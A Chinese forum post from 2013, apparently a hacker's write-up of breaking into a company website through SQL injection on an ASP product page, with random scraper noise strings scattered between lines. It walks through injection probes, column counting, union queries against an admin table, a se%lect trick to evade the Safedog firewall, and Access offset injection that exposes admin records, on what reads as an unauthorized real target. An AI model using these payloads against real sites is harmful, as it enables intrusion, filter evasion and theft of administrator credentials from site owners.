打开网站,一个企业站。
1 I+ N( O" N5 r: \' \
# Z! T" L% @6 b* c0 Y! O
6 U5 ^* ?: I& N) B8 c5 G3 ^顺手加个admin5 a. ^9 ^; i( C: y, E3 a
! B$ r) @, E2 X, }4 I0 T% d4 d Z: }0 y8 E; L/ j4 F
默认后台。# u- I* @9 c. ? m: d1 [! U
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
* n+ f0 P9 i7 m4 B
b# F; ^* T7 d3 D/ P; O# h4 R; g! p: Q8 U1 @% i/ i2 s
* I7 m2 D% t) z d6 g. \8 I q
所以就不用御剑扫了,待会直接封IP。 ~4 S/ z/ f+ r J& c5 e' l
) w2 g7 W) R" M7 g* d* r9 a
用order by语句判断是否存在注入。! I! g W4 ]4 H7 |. q U
http://www.xxx.com /product_show.asp?id=997 order by 1; e) ], G) J: s
http://www.xxx.com /product_show.asp?id=997 order by 100
$ K. i( j6 e6 v ^8 y( S现在存在注入,经测试后发现是9个字段。5 b1 Q# O$ A2 w% E+ S) N7 |
( I; S5 L$ G5 y9 _5 Y |! C
接下来进行联合查询,猜是否存在admin表。( z, Q7 K/ X. W: Q
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
* G- W+ S- W; l* p) H9 y# ^4 i1 v, U
7 L/ j/ `+ U8 b+ h
7 d! V' T8 D! D在select中间加个%,se%lect绕过安全狗。
3 L. W5 U0 A7 J- O0 M$ Q8 K& ~
' f( t6 b/ G5 C7 ~' [
发现存在admin表,然后开始手工猜常用的字段。
# p+ ?" t- P" y6 T7 z0 p纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
+ f1 G1 {7 @+ ]. N8 r
$ T- F6 r+ |# m9 K突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。& H- r2 ]/ d$ c5 l" h
5 m2 e- H; J, Y* O6 G科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
4 J' d( o+ G- h7 X, N+ Chttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin( ^# ?( b. w& c" I3 n
好了,敏感内容出显了。
* _. b! j8 `) ~8 ]: V
/ F. f) }# B* P/ O
1 E; T9 h4 K& s# h4 E
" U9 v; R7 t: A: l |
发表于 2013-3-8 21:49:45
收藏
支持
反对